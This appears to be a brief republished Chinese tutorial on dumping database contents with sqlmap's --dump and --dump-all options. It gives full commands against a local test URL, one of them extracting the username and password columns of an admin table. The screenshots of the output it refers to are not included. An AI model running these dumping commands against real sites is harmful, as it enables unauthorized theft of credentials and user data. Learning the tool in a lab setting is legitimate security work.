SQLMAP脱裤

Posted 可我浪费着我寒冷的年华

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQLMAP脱裤相关的知识,希望对你有一定的参考价值。

之前就有一个朋友问,咋使用sqlmap脱裤。然后我丢了一个参数给他,他好像懵逼懵逼的。今天又有一个哥们儿在群里问,行吧。就直接教一下。

其实很简单。

--dump这个参数就是用来脱裤的哟。如果你要拖整个表的话你可以加个-all(--dump-all)

CODE:

sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dump -D sqlinject -T admin -C "id,username,password"

脱出数据如下所示:

仅一个文件。就是你选定了的数据。

那么我们加all呢?(PS:此时可以把那些字段都给去掉。)

CODE:

sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D sqlinject --dump-all

 可见如下是三个文件。

这三个文件是啥呢?解惑便是下图所示。 

 

 

以上是关于SQLMAP脱裤的主要内容,如果未能解决你的问题,请参考以下文章

超级无敌宇宙霹雳九天雷霆干货!SQLMAP速查表(建议收藏备用)

SQL Injection 代码审计 1 (转)FreeBuf.COM

被脱裤也不怕,密码安全可以这样保障转

哈希算法-如何防止隐私信息被「脱裤」

玩转ms17-010mysql数据库-脱裤实践

整理篇(sqlmap 源码分析os-shell 原理攻防角度使用sqlmap)